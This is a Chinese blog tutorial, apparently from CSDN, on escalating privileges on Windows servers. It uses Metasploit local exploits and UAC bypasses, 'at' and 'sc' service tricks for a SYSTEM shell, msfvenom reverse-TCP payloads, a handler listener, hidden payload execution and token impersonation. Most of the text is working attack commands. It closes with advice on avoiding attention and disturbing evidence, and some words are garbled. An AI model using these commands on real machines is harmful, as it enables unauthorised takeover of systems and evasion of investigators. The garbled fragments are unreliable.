windows提权—msf、at、sc提权

msf提权

适用版本:windows 2k3、xp

获取到服务器的 meterpreter 后,有三个方向

  • getsystem提权

可以直接使用 getsystem 提权
没成功
在这里插入图片描述

  • 绕过UAC策略

MSF使用注册表 bypass uac 提权
漏洞模块:

exploit/windows/local/ask
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection

操作:

use exploit/windows/local/ask
options
set session 4     //3被占用了
set TECHNIQUE EXE
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.109
set lport 4444
exploit

未成功
在这里插入图片描述

  • 使用漏洞提权
meterpreter > run post/windows/gather/enum_patches

显示Q147222已被安装
在这里插入图片描述

复制到在线补丁对比平台

http://bugs.hacking8.com/tiquan/

在这里插入图片描述

在这里插入图片描述

或者使用getroot-tools 查看未打补丁
下载地址:

https://github.com/5z1punch/GetRoot-Tools

在这里插入图片描述

使用MS11-080

search MS11-080
use exploit/windows/local/ms11_080_afdjoinleaf
set session 4
exploit

at 命令提权

适用系统:Windows2000、Windows 2003、Windows XP
前提:获得服务器admin权限,可以使用at命令,由此提权为system权限

at 是一个发布定时任务计划的命令行工具,语法比较简单。通过 at 命令发布的
定时任务计划, Windows 默认以 SYSTEM 权限运行。定时任务计划可以是批处理、可以是一个二进制文件

提权操作
定时开启一个cmd的shell

##通过 /interactive 开启界面交互模式
at 16.40 /interactive "cmd.exe"

在这里插入图片描述

现在我们只是获得了一个system的shell,要把系统提权到system权限才行
在得到一个system的cmd之后,使用taskmgr命令调用任务管理器,此时的
任务管理器是system权限,然后kill掉explore进程,再使用任务管理器
新建explore进程,将会得到一个system的桌面环境

C:\WINDOWS\system32\taskmgr

杀掉explore进程
在这里插入图片描述

再重新打开explorer进程
在这里插入图片描述

现在就是system权限了
在这里插入图片描述

MSF中at提权
思路:使用at命令执行木马反弹shell,攻击机上获得的shell时system权限

靶机:

at 17:34 /interactive "C:\wmpub\shell.exe"

在这里插入图片描述

kali

msf6>use exploit/multi/handler
msf6>set payload windows/meterpreter/reverse_tcp
msf6>set lhost 192.168.0.109
msf6>set lport 4444
msf6>exploit

提权成功
在这里插入图片描述

SC提权

适用版本(win7、8、08、12、16)
前提:获得服务器admin权限,可以使用at命令,由此提权为system权限

##CMD下

#配置一个服务syscmd
C:>sc Create syscmd binPath= “cmd /K start” type= own type= interact 
#启动服务获取system权限的cmd
C:>sc start syscmd 

其中syscmd是服务名称,可以随意填写,binpath是启动的命令,type=own是指服务这个服务属于谁,type=interact是指交互式shell

此时就以system权限打开了一个cmd,然后和at提权的后续做法相同,使用taskmgr命令调用任务管理器,此时的任务管理器是system权限,然后kill掉explore进程,再使用任务管理器新建explore进程,将会得到一个system的桌面环境

### 使用 Metasploit Framework 在 Windows 系统上进行操作 #### 准备工作 为了在 Windows 系统上使用 Metasploit Framework (MSF) 进行,需先确保 MSF 已安装并配置好。此外,还需具备对目标系统的初步访问限,通常通过已有的 Meterpreter 会话获得。 #### 创建攻击载荷 可以借助 `msfvenom` 来创建适用于特定场景下的恶意软件载荷。对于 Windows 而言,可能涉及生成一个能够绕过现有安全机制的可执行文件或 DLL 文件[^1]。 ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your_IP> LPORT=<Port> -f exe > shell.exe ``` 此命令将生成一个反向 TCP 的 Meterpreter 载荷,并保存为 `shell.exe` 文件。 #### 配置本地监听器 一旦拥有可用于投放的载荷,下一步是在攻击者控制的机器上设置一个监听器等待连接回传。这可通过启动一个多处理程序 (`multi/handler`) 实现: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <Your_IP> exploit ``` 上述 Ruby 代码片段展示了如何配置 Metasploit 多处理器以接收来自被感染主机的回调请求[^4]。 #### 上载与执行载荷 假设已经有一个低特级别的 Meterpreter 会话可用,则可以直接利用该通道传输之前准备好的二进制文件至受害者的磁盘空间内;之后再调用相应的命令示符来触发其运行过程。 ```python meterpreter > upload /path/to/shell.exe C:\temp\32.exe meterpreter > execute -H -f C:\temp\32.exe ``` 这里展示的是怎样把名为 `32.exe` 的自定义 PE 文件放置于远程计算机上的临时位置,并立即启动它以便建立新的通信链路[^3]。 #### 应用技术 当获得了初始的 Meterpreter 访问后,便可以根据实际情况选用不同的策略尝试升当前用户的限级别。比如,如果怀疑存在某些未修补的服务漏洞或是弱密码账户的话,那么就可以针对性地加载对应的辅助模块来进行探测和利用活动。 ```ruby meterpreter > getuid server1\target_user meterpreter > load incognito [*] Loading extension incognito... meterpreter > list_tokens -u meterpreter > impersonate_token domain\administrator ``` 上面的例子说明了如何切换到更高限的身份令牌从而实现无缝转换成管理员角色的操作环境。 #### 后续行动 成功取得高限后,可根据具体需求继续开展后续的任务,如搜集敏感资料、部署持久化组件或者是实施横向扩展等行为。值得注意的是,在整个过程中务必谨慎行事以免引起不必要的注意或者破坏证据链条。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值